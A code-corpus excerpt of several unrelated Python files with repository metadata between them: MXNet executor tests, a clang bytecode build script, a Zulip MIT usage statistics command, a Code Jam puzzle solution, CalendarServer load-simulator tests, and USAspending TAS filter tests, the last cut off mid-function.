out3 = exec3.outputs[0].asnumpy()
out4 = exec4.outputs[0].asnumpy()
assert reldiff(out1, out2) < 1e-6
assert reldiff(out1, out3) < 1e-6
assert reldiff(out1, out4) < 1e-6
# test gradient
out_grad = mx.nd.array(np.ones(out2.shape))
lhs_grad2, rhs_grad2 = gf(out_grad.asnumpy(),
lhs_arr.asnumpy(),
rhs_arr.asnumpy())
executor.backward([out_grad])
assert reldiff(lhs_grad.asnumpy(), lhs_grad2) < 1e-6
assert reldiff(rhs_grad.asnumpy(), rhs_grad2) < 1e-6
def test_bind():
np.random.seed(0)
nrepeat = 10
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
check_bind_with_uniform(lambda x, y: x + y,
lambda g, x, y: (g, g),
dim)
check_bind_with_uniform(lambda x, y: x - y,
lambda g, x, y: (g, -g),
dim)
check_bind_with_uniform(lambda x, y: x * y,
lambda g, x, y: (y * g, x * g),
dim)
check_bind_with_uniform(lambda x, y: x / y,
lambda g, x, y: (g / y, -x * g/ (y**2)),
dim)
check_bind_with_uniform(lambda x, y: np.maximum(x, y),
lambda g, x, y: (g * (x>y), g * (y>x)),
dim,
sf=mx.symbol.maximum)
check_bind_with_uniform(lambda x, y: np.minimum(x, y),
lambda g, x, y: (g * (x<y), g * (y<x)),
dim,
sf=mx.symbol.minimum)
def test_dot():
np.random.seed(0)
nrepeat = 10
maxdim = 4
for repeat in range(nrepeat):
s =tuple(np.random.randint(1, 500, size=3))
check_bind_with_uniform(lambda x, y: np.dot(x, y),
lambda g, x, y: (np.dot(g, y.T), np.dot(x.T, g)),
2,
lshape=(s[0], s[1]),
rshape=(s[1], s[2]),
sf = mx.symbol.dot)
for repeat in range(nrepeat):
s =tuple(np.random.randint(1, 500, size=1))
check_bind_with_uniform(lambda x, y: np.dot(x, y),
lambda g, x, y: (g * y, g * x),
2,
lshape=(s[0],),
rshape=(s[0],),
sf = mx.symbol.dot)
def test_reshape():
x = mx.sym.Variable('x')
y = mx.sym.FullyConnected(x, num_hidden=4)
exe = y.simple_bind(mx.cpu(), x=(5,4))
exe.arg_arrays[0][:] = 1
exe.arg_arrays[1][:] = mx.nd.ones((4,4))
exe.arg_arrays[2][:] = 0
new_exe = exe.reshape(x=(3,4))
new_exe.forward(is_train=False)
# test sub exec forward
assert np.all(new_exe.outputs[0].asnumpy() == 4)
# test shared memory
assert np.all(exe.outputs[0].asnumpy()[:3] == 4)
# test base exec forward
exe.forward(is_train=False)
assert np.all(exe.outputs[0].asnumpy() == 4)
if __name__ == "__main__":
test_bind()
test_reshape()
| 35.651852
| 81
| 0.484729
|
9cdb9cb5334aacf4c1be5312ee84a085523f701b
| 873
|
py
|
Python
|
BytecodeBuilder.py
|
gydrogen/hydrogen
|
6c448b67471ce2bbef12a36a0182b58ac56a7da3
|
[
"MIT"
] | null | null | null |
BytecodeBuilder.py
|
gydrogen/hydrogen
|
6c448b67471ce2bbef12a36a0182b58ac56a7da3
|
[
"MIT"
] | null | null | null |
BytecodeBuilder.py
|
gydrogen/hydrogen
|
6c448b67471ce2bbef12a36a0182b58ac56a7da3
|
[
"MIT"
] | null | null | null |
import os
from sys import argv
def build(file, tag=''):
if not os.path.isfile(file):
print(f'{file} is not a valid input file.')
return
pwd = os.getcwd()
path, infile = os.path.split(file)
outfile = infile.replace('.c', f'{tag}.bc', 1)
os.chdir(path)
command = f"clang -c -O0 -Xclang -disable-O0-optnone -g -emit-llvm -S {infile} -o {outfile}"
print(f'In directory {path} execute {command}')
os.system(command)
os.chdir(pwd)
files = [
'./TestPrograms/Buggy/Prog.c',
'./TestPrograms/Buggy2/Prog.c',
'./TestPrograms/Correct/Prog.c',
'./TestPrograms/Mine/Ladybug1/main.c',
'./TestPrograms/Mine/Ladybug2/main.c',
'./TestPrograms/Mine/Ladybug3/main.c',
]
for v in files:
build(v)
# if len(argv) > 1:
# build(argv[1])
# else:
# print('Usage: python3 BytecodeBuilder.py <filename>')
| 25.676471
| 96
| 0.616266
|
541cc44ffd403ff148ceb006127bfea30f4b22c7
| 3,761
|
py
|
Python
|
analytics/management/commands/analyze_mit.py
|
MarkCupitt/zulip
|
86bb9a9431084e59b491ca7980ec4f4333eb96f7
|
[
"Apache-2.0"
] | 1
|
2017-07-27T19:49:12.000Z
|
2017-07-27T19:49:12.000Z
|
analytics/management/commands/analyze_mit.py
|
eric-erki/zulip
|
a063dd3b26f7ada794e14ace0d24ea1834611446
|
[
"Apache-2.0"
] | 9
|
2021-02-08T20:22:39.000Z
|
2022-02-11T03:40:19.000Z
|
analytics/management/commands/analyze_mit.py
|
tobby2002/zulip
|
66e7c455759f9368bae16b9a604cf63f8e3524cd
|
[
"Apache-2.0"
] | 1
|
2021-04-09T05:50:23.000Z
|
2021-04-09T05:50:23.000Z
|
from __future__ import absolute_import
from __future__ import print_function
from typing import Any
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.models import Recipient, Message
from zerver.lib.timestamp import timestamp_to_datetime
import datetime
import time
import logging
def compute_stats(log_level):
# type: (int) -> None
logger = logging.getLogger()
logger.setLevel(log_level)
one_week_ago = timestamp_to_datetime(time.time()) - datetime.timedelta(weeks=1)
mit_query = Message.objects.filter(sender__realm__domain="mit.edu",
recipient__type=Recipient.STREAM,
pub_date__gt=one_week_ago)
for bot_sender_start in ["imap.", "rcmd.", "sys."]:
mit_query = mit_query.exclude(sender__email__startswith=(bot_sender_start))
# Filtering for "/" covers tabbott/extra@ and all the daemon/foo bots.
mit_query = mit_query.exclude(sender__email__contains=("/"))
mit_query = mit_query.exclude(sender__email__contains=("aim.com"))
mit_query = mit_query.exclude(
sender__email__in=["rss@mit.edu", "bash@mit.edu", "apache@mit.edu",
"bitcoin@mit.edu", "lp@mit.edu", "clocks@mit.edu",
"root@mit.edu", "nagios@mit.edu",
"www-data|local-realm@mit.edu"])
user_counts = {} # type: Dict[str, Dict[str, int]]
for m in mit_query.select_related("sending_client", "sender"):
email = m.sender.email
user_counts.setdefault(email, {})
user_counts[email].setdefault(m.sending_client.name, 0)
user_counts[email][m.sending_client.name] += 1
total_counts = {} # type: Dict[str, int]
total_user_counts = {} # type: Dict[str, int]
for email, counts in user_counts.items():
total_user_counts.setdefault(email, 0)
for client_name, count in counts.items():
total_counts.setdefault(client_name, 0)
total_counts[client_name] += count
total_user_counts[email] += count
logging.debug("%40s | %10s | %s" % ("User", "Messages", "Percentage Zulip"))
top_percents = {} # type: Dict[int, float]
for size in [10, 25, 50, 100, 200, len(total_user_counts.keys())]:
top_percents[size] = 0.0
for i, email in enumerate(sorted(total_user_counts.keys(),
key=lambda x: -total_user_counts[x])):
percent_zulip = round(100 - (user_counts[email].get("zephyr_mirror", 0)) * 100. /
total_user_counts[email], 1)
for size in top_percents.keys():
top_percents.setdefault(size, 0)
if i < size:
top_percents[size] += (percent_zulip * 1.0 / size)
logging.debug("%40s | %10s | %s%%" % (email, total_user_counts[email],
percent_zulip))
logging.info("")
for size in sorted(top_percents.keys()):
logging.info("Top %6s | %s%%" % (size, round(top_percents[size], 1)))
grand_total = sum(total_counts.values())
print(grand_total)
logging.info("%15s | %s" % ("Client", "Percentage"))
for client in total_counts.keys():
logging.info("%15s | %s%%" % (client, round(100. * total_counts[client] / grand_total, 1)))
class Command(BaseCommand):
option_list = BaseCommand.option_list + \
(make_option('--verbose', default=False, action='store_true'),)
help = "Compute statistics on MIT Zephyr usage."
def handle(self, *args, **options):
# type: (*Any, **Any) -> None
level = logging.INFO
if options["verbose"]:
level = logging.DEBUG
compute_stats(level)
| 43.229885
| 99
| 0.620048
|
dffc0ac6f2e9f1c76ebaa025e98761dce995c643
| 663
|
py
|
Python
|
codejam/14/0q/a-magic.py
|
neizod/problems
|
180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a
|
[
"MIT"
] | 1
|
2015-10-17T11:15:42.000Z
|
2015-10-17T11:15:42.000Z
|
codejam/14/0q/a-magic.py
|
neizod/problems
|
180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a
|
[
"MIT"
] | null | null | null |
codejam/14/0q/a-magic.py
|
neizod/problems
|
180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a
|
[
"MIT"
] | null | null | null |
def foo(answer_1, matrix_1, answer_2, matrix_2):
candidate_1 = matrix_1[answer_1-1]
candidate_2 = matrix_2[answer_2-1]
final = set(candidate_1) & set(candidate_2)
if len(final) == 0:
return 'Volunteer cheated!'
elif len(final) > 1:
return 'Bad magician!'
else:
return final.pop()
for case in range(int(input())):
answer_1 = int(input())
matrix_1 = [[int(n) for n in input().split()] for _ in range(4)]
answer_2 = int(input())
matrix_2 = [[int(n) for n in input().split()] for _ in range(4)]
answer = foo(answer_1, matrix_1, answer_2, matrix_2)
print('Case #{}: {}'.format(case+1, answer))
| 33.15
| 68
| 0.616893
|
28f730efdc85440dca79bc391746dfdca8a03165
| 22,252
|
py
|
Python
|
contrib/performance/loadtest/test_sim.py
|
backwardn/ccs-calendarserver
|
13c706b985fb728b9aab42dc0fef85aae21921c3
|
[
"Apache-2.0"
] | 462
|
2016-08-14T17:43:24.000Z
|
2022-03-17T07:38:16.000Z
|
contrib/performance/loadtest/test_sim.py
|
backwardn/ccs-calendarserver
|
13c706b985fb728b9aab42dc0fef85aae21921c3
|
[
"Apache-2.0"
] | 72
|
2016-09-01T23:19:35.000Z
|
2020-02-05T02:09:26.000Z
|
contrib/performance/loadtest/test_sim.py
|
backwardn/ccs-calendarserver
|
13c706b985fb728b9aab42dc0fef85aae21921c3
|
[
"Apache-2.0"
] | 171
|
2016-08-16T03:50:30.000Z
|
2022-03-26T11:49:55.000Z
|
##
# Copyright (c) 2011-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
##
from plistlib import writePlistToString
from cStringIO import StringIO
from twisted.python.log import msg
from twisted.python.usage import UsageError
from twisted.python.filepath import FilePath
from twisted.internet.defer import Deferred, succeed
from twisted.trial.unittest import TestCase
from contrib.performance.stats import NormalDistribution
from contrib.performance.loadtest.ical import OS_X_10_6
from contrib.performance.loadtest.profiles import Eventer, Inviter, Accepter
from contrib.performance.loadtest.population import (
SmoothRampUp, ClientType, PopulationParameters, Populator, CalendarClientSimulator,
ProfileType, SimpleStatistics
)
from contrib.performance.loadtest.sim import (
Arrival, SimOptions, LoadSimulator, LagTrackingReactor,
_DirectoryRecord
)
VALID_CONFIG = {
'servers': {
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
'webadmin': {
'enabled': True,
'HTTPPort': 8080,
},
'arrival': {
'factory': 'contrib.performance.loadtest.population.SmoothRampUp',
'params': {
'groups': 10,
'groupSize': 1,
'interval': 3,
},
},
}
VALID_CONFIG_PLIST = writePlistToString(VALID_CONFIG)
class SimOptionsTests(TestCase):
def test_defaultConfig(self):
"""
If the I{config} option is not specified, the default config.plist in
the source tree is used.
"""
options = SimOptions()
self.assertEqual(options['config'], FilePath(__file__).sibling('config.plist'))
def test_configFileNotFound(self):
"""
If the filename given to the I{config} option is not found,
L{SimOptions.parseOptions} raises a L{UsageError} indicating
this.
"""
name = FilePath(self.mktemp())
options = SimOptions()
exc = self.assertRaises(
UsageError, options.parseOptions, ['--config', name.path])
self.assertEquals(
str(exc), "--config %s: No such file or directory" % (name.path,))
def test_configFileNotParseable(self):
"""
If the contents of the file given to the I{config} option
cannot be parsed by L{ConfigParser},
L{SimOptions.parseOptions} raises a L{UsageError} indicating
this.
"""
config = FilePath(self.mktemp())
config.setContent("some random junk")
options = SimOptions()
exc = self.assertRaises(
UsageError, options.parseOptions, ['--config', config.path])
self.assertEquals(
str(exc),
"--config %s: syntax error: line 1, column 0" % (config.path,))
class CalendarClientSimulatorTests(TestCase):
"""
Tests for L{CalendarClientSimulator} which adds running clients to
a simulation.
"""
realmName = 'stub'
def _user(self, name):
password = 'password-' + name
email = name + "@example.com"
record = _DirectoryRecord(name, password, name, email, name)
return record
def test_createUser(self):
"""
Subsequent calls to L{CalendarClientSimulator._createUser}
with different user numbers return user details from different
directory records.
"""
calsim = CalendarClientSimulator(
[self._user('alice'), self._user('bob'), self._user('carol')],
Populator(None), None, None, None,
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
None, None)
users = sorted([
calsim._createUser(0)[1],
calsim._createUser(1)[1],
calsim._createUser(2)[1],
])
self.assertEqual(['alice', 'bob', 'carol'], users)
def test_createUserAuthInfo(self):
"""
The auth handler returned by L{CalendarClientSimulator._createUser}
includes the password taken from user's directory record.
"""
calsim = CalendarClientSimulator(
[self._user('alice')],
Populator(None), None, None, None,
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
None, None)
_ignore_record, user, auth = calsim._createUser(0)
self.assertEqual(
auth['basic'].passwd.find_user_password('Test Realm', 'http://example.org:1234/')[1],
'password-' + user)
self.assertEqual(
auth['digest'].passwd.find_user_password('Test Realm', 'http://example.org:1234/')[1],
'password-' + user)
def test_stop(self):
"""
After L{CalendarClientSimulator.stop} is called, failed clients and
profiles are not logged.
"""
class BrokenClient(object):
def __init__(self, reactor, serverAddress, principalPathTemplate, serializationPath, userInfo, auth, instanceNumber, runResult):
self._runResult = runResult
def run(self):
return self._runResult
def stop(self):
return succeed(None)
class BrokenProfile(object):
def __init__(self, reactor, simulator, client, userNumber, runResult):
self._runResult = runResult
self.enabled = True
def initialize(self):
return succeed(None)
def run(self):
return self._runResult
clientRunResult = Deferred()
profileRunResult = Deferred()
params = PopulationParameters()
params.addClient(1, ClientType(
BrokenClient, {'runResult': clientRunResult},
[ProfileType(BrokenProfile, {'runResult': profileRunResult})])
)
sim = CalendarClientSimulator(
[self._user('alice')], Populator(None), None, params, None,
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
None, None)
sim.add(1, 1)
sim.stop()
clientRunResult.errback(RuntimeError("Some fictional client problem"))
profileRunResult.errback(RuntimeError("Some fictional profile problem"))
self.assertEqual([], self.flushLoggedErrors())
class Reactor(object):
message = "some event to be observed"
def __init__(self):
self._triggers = []
self._whenRunning = []
def run(self):
for thunk in self._whenRunning:
thunk()
msg(thingo=self.message)
for _ignore_phase, event, thunk in self._triggers:
if event == 'shutdown':
thunk()
def callWhenRunning(self, thunk):
self._whenRunning.append(thunk)
def addSystemEventTrigger(self, phase, event, thunk):
self._triggers.append((phase, event, thunk))
class Observer(object):
def __init__(self):
self.reported = False
self.events = []
def observe(self, event):
self.events.append(event)
def report(self, output):
self.reported = True
def failures(self):
return []
class NullArrival(object):
def run(self, sim):
pass
class StubSimulator(LoadSimulator):
def run(self):
return 3
class LoadSimulatorTests(TestCase):
def test_main(self):
"""
L{LoadSimulator.main} raises L{SystemExit} with the result of
L{LoadSimulator.run}.
"""
config = FilePath(self.mktemp())
config.setContent(VALID_CONFIG_PLIST)
exc = self.assertRaises(
SystemExit, StubSimulator.main, ['--config', config.path])
self.assertEquals(
exc.args, (StubSimulator(None, None, None, None, None, None, None).run(),))
def test_createSimulator(self):
"""
L{LoadSimulator.createSimulator} creates a L{CalendarClientSimulator}
with its own reactor and host and port information from the
configuration file.
"""
servers = {
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
}
reactor = object()
sim = LoadSimulator(servers, None, None, None, None, None, None, reactor=reactor)
calsim = sim.createSimulator()
self.assertIsInstance(calsim, CalendarClientSimulator)
self.assertIsInstance(calsim.reactor, LagTrackingReactor)
self.assertIdentical(calsim.reactor._reactor, reactor)
self.assertEquals(calsim.servers, servers)
def test_loadAccountsFromFile(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader from the
config file and uses it to create user records for use in the
simulation.
"""
accounts = FilePath(self.mktemp())
accounts.setContent("foo,bar,baz,quux,goo\nfoo2,bar2,baz2,quux2,goo2\n")
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.recordsFromCSVFile",
"params": {
"path": accounts.path,
"interleavePods": True,
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
io = StringIO()
sim = LoadSimulator.fromCommandLine(['--config', configpath.path], io)
self.assertEquals(io.getvalue(), "Loaded 2 accounts.\n")
self.assertEqual(2, len(sim.records))
self.assertEqual(sim.records[0].uid, 'foo')
self.assertEqual(sim.records[0].password, 'bar')
self.assertEqual(sim.records[0].commonName, 'baz')
self.assertEqual(sim.records[0].email, 'quux')
self.assertEqual(sim.records[1].uid, 'foo2')
self.assertEqual(sim.records[1].password, 'bar2')
self.assertEqual(sim.records[1].commonName, 'baz2')
self.assertEqual(sim.records[1].email, 'quux2')
def test_loadDefaultAccountsFromFile(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader (with
empty path)from the config file and uses it to create user
records for use in the simulation.
"""
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.recordsFromCSVFile",
"params": {
"path": "",
"interleavePods": True,
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
sim = LoadSimulator.fromCommandLine(['--config', configpath.path],
StringIO())
self.assertEqual(99, len(sim.records))
self.assertEqual(sim.records[0].uid, 'user01')
self.assertEqual(sim.records[0].password, 'user01')
self.assertEqual(sim.records[0].commonName, 'User 01')
self.assertEqual(sim.records[0].email, 'user01@example.com')
self.assertEqual(sim.records[98].uid, 'user99')
self.assertEqual(sim.records[98].password, 'user99')
self.assertEqual(sim.records[98].commonName, 'User 99')
self.assertEqual(sim.records[98].email, 'user99@example.com')
def test_generateRecordsDefaultPatterns(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader from the
config file and uses it to generate user records for use in the
simulation.
"""
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.generateRecords",
"params": {
"count": 2
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
sim = LoadSimulator.fromCommandLine(['--config', configpath.path],
StringIO())
self.assertEqual(2, len(sim.records))
self.assertEqual(sim.records[0].uid, 'user1')
self.assertEqual(sim.records[0].password, 'user1')
self.assertEqual(sim.records[0].commonName, 'User 1')
self.assertEqual(sim.records[0].email, 'user1@example.com')
self.assertEqual(sim.records[1].uid, 'user2')
self.assertEqual(sim.records[1].password, 'user2')
self.assertEqual(sim.records[1].commonName, 'User 2')
self.assertEqual(sim.records[1].email, 'user2@example.com')
def test_generateRecordsNonDefaultPatterns(self):
"""
L{LoadSimulator.fromCommandLine} takes an account loader from the
config file and uses it to generate user records for use in the
simulation.
"""
config = VALID_CONFIG.copy()
config["accounts"] = {
"loader": "contrib.performance.loadtest.sim.generateRecords",
"params": {
"count": 3,
"uidPattern": "USER%03d",
"passwordPattern": "PASSWORD%03d",
"namePattern": "Test User %03d",
"emailPattern": "USER%03d@example2.com",
},
}
configpath = FilePath(self.mktemp())
configpath.setContent(writePlistToString(config))
sim = LoadSimulator.fromCommandLine(['--config', configpath.path],
StringIO())
self.assertEqual(3, len(sim.records))
self.assertEqual(sim.records[0].uid, 'USER001')
self.assertEqual(sim.records[0].password, 'PASSWORD001')
self.assertEqual(sim.records[0].commonName, 'Test User 001')
self.assertEqual(sim.records[0].email, 'USER001@example2.com')
self.assertEqual(sim.records[2].uid, 'USER003')
self.assertEqual(sim.records[2].password, 'PASSWORD003')
self.assertEqual(sim.records[2].commonName, 'Test User 003')
self.assertEqual(sim.records[2].email, 'USER003@example2.com')
def test_specifyRuntime(self):
"""
L{LoadSimulator.fromCommandLine} recognizes the I{--runtime} option to
specify a limit on how long the simulation will run.
"""
config = FilePath(self.mktemp())
config.setContent(VALID_CONFIG_PLIST)
sim = LoadSimulator.fromCommandLine(['--config', config.path, '--runtime', '123'])
self.assertEqual(123, sim.runtime)
def test_loadServerConfig(self):
"""
The Calendar Server host and port are loaded from the [server]
section of the configuration file specified.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString({"servers": {
"PodA": {
"enabled": True,
"uri": 'https://127.0.0.3:8432/',
"stats": {"enabled": False},
},
}})
)
sim = LoadSimulator.fromCommandLine(['--config', config.path])
self.assertEquals(sim.servers["PodA"]["uri"], "https://127.0.0.3:8432/")
def test_loadArrivalConfig(self):
"""
The arrival policy type and arguments are loaded from the
[arrival] section of the configuration file specified.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString({
"arrival": {
"factory": "contrib.performance.loadtest.population.SmoothRampUp",
"params": {
"groups": 10,
"groupSize": 1,
"interval": 3,
},
},
})
)
sim = LoadSimulator.fromCommandLine(['--config', config.path])
self.assertEquals(
sim.arrival,
Arrival(SmoothRampUp, dict(groups=10, groupSize=1, interval=3)))
def test_createArrivalPolicy(self):
"""
L{LoadSimulator.createArrivalPolicy} creates an arrival
policy based on the L{Arrival} passed to its initializer.
"""
class FakeArrival(object):
def __init__(self, reactor, x, y):
self.reactor = reactor
self.x = x
self.y = y
reactor = object()
sim = LoadSimulator(
None, None, None, None, Arrival(FakeArrival, {'x': 3, 'y': 2}), None, reactor=reactor)
arrival = sim.createArrivalPolicy()
self.assertIsInstance(arrival, FakeArrival)
self.assertIdentical(arrival.reactor, sim.reactor)
self.assertEquals(arrival.x, 3)
self.assertEquals(arrival.y, 2)
def test_loadPopulationParameters(self):
"""
Client weights and profiles are loaded from the [clients]
section of the configuration file specified.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString(
{
"clients": [
{
"software": "contrib.performance.loadtest.ical.OS_X_10_6",
"params": {
"foo": "bar"
},
"profiles": [
{
"params": {
"interval": 25,
"eventStartDistribution": {
"type": "contrib.performance.stats.NormalDistribution",
"params": {
"mu": 123,
"sigma": 456,
}
}
},
"class": "contrib.performance.loadtest.profiles.Eventer"
}
],
"weight": 3,
}
]
}
)
)
sim = LoadSimulator.fromCommandLine(
['--config', config.path, '--clients', config.path]
)
expectedParameters = PopulationParameters()
expectedParameters.addClient(
3,
ClientType(
OS_X_10_6,
{"foo": "bar"},
[
ProfileType(
Eventer, {
"interval": 25,
"eventStartDistribution": NormalDistribution(123, 456)
}
)
]
)
)
self.assertEquals(sim.parameters, expectedParameters)
def test_requireClient(self):
"""
At least one client is required, so if a configuration with an
empty clients array is specified, a single default client type
is used.
"""
config = FilePath(self.mktemp())
config.setContent(writePlistToString({"clients": []}))
sim = LoadSimulator.fromCommandLine(
['--config', config.path, '--clients', config.path]
)
expectedParameters = PopulationParameters()
expectedParameters.addClient(
1, ClientType(OS_X_10_6, {}, [Eventer, Inviter, Accepter]))
self.assertEquals(sim.parameters, expectedParameters)
def test_loadLogObservers(self):
"""
Log observers specified in the [observers] section of the
configuration file are added to the logging system.
"""
config = FilePath(self.mktemp())
config.setContent(
writePlistToString(
{
"observers": [
{
"type": "contrib.performance.loadtest.population.SimpleStatistics",
"params": {},
},
]
}
)
)
sim = LoadSimulator.fromCommandLine(['--config', config.path])
self.assertEquals(len(sim.observers), 1)
self.assertIsInstance(sim.observers[0], SimpleStatistics)
def test_observeRunReport(self):
"""
Each log observer is added to the log publisher before the
simulation run is started and has its C{report} method called
after the simulation run completes.
"""
observers = [Observer()]
sim = LoadSimulator(
{
"PodA": {
"enabled": True,
"uri": 'http://example.org:1234/',
"stats": {"enabled": False},
},
},
"/principals/users/%s/",
None,
None,
Arrival(lambda reactor: NullArrival(), {}),
None, observers, reactor=Reactor())
io = StringIO()
sim.run(io)
self.assertEquals(io.getvalue(), "\n*** PASS\n")
self.assertTrue(observers[0].reported)
self.assertEquals(
[e for e in observers[0].events if "thingo" in e][0]["thingo"],
Reactor.message
)
| 35.948304
| 140
| 0.554242
|
ca112b6837b31917ef60859c69b4cd4c59d050d8
| 10,341
|
py
|
Python
|
usaspending_api/search/tests/integration/hierarchical_filters/test_tas_filter_heirarchical_cases.py
|
g4brielvs/usaspending-api
|
bae7da2c204937ec1cdf75c052405b13145728d5
|
[
"CC0-1.0"
] | 217
|
2016-11-03T17:09:53.000Z
|
2022-03-10T04:17:54.000Z
|
usaspending_api/search/tests/integration/hierarchical_filters/test_tas_filter_heirarchical_cases.py
|
g4brielvs/usaspending-api
|
bae7da2c204937ec1cdf75c052405b13145728d5
|
[
"CC0-1.0"
] | 622
|
2016-09-02T19:18:23.000Z
|
2022-03-29T17:11:01.000Z
|
usaspending_api/search/tests/integration/hierarchical_filters/test_tas_filter_heirarchical_cases.py
|
g4brielvs/usaspending-api
|
bae7da2c204937ec1cdf75c052405b13145728d5
|
[
"CC0-1.0"
] | 93
|
2016-09-07T20:28:57.000Z
|
2022-02-25T00:25:27.000Z
|
import pytest
from usaspending_api.search.tests.integration.hierarchical_filters.tas_fixtures import (
BASIC_TAS,
ATA_TAS,
SISTER_TAS,
TAS_DICTIONARIES,
TAS_STRINGS,
)
from usaspending_api.search.tests.integration.hierarchical_filters.tas_search_test_helpers import (
_setup_es,
query_by_tas,
)
@pytest.mark.django_db
def test_agency_level_require_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_agency_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_fa_level_require_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_fa_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_tas_level_require_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_agency_level_exclude_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_agency_path(ATA_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_fa_level_exclude_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_fa_path(ATA_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_tas_level_exclude_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_tas_path(ATA_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_agency_level_require_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_agency_path(ATA_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_fa_level_require_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_fa_path(ATA_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_tas_level_require_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(ATA_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_agency_level_exclude_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_agency_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_fa_level_exclude_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_fa_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_tas_level_exclude_non_match(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_tas_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_double_require(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_fa_path(BASIC_TAS), _tas_path(BASIC_TAS)]})
assert resp.json()["results"] == [_award1()]
@pytest.mark.django_db
def test_double_exclude(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"exclude": [_fa_path(BASIC_TAS), _tas_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_exclude_overrides_require(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_tas_path(BASIC_TAS)], "exclude": [_tas_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_exclude_eclipsing_require(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
resp = query_by_tas(client, {"require": [_agency_path(BASIC_TAS)], "exclude": [_fa_path(BASIC_TAS)]})
assert resp.json()["results"] == []
@pytest.mark.django_db
def test_require_eclipsing_exclude(client, monkeypatch, elasticsearch_award_index, award_with_tas):
_setup_es(client, monkeypatch, elasticsearch_award_index)
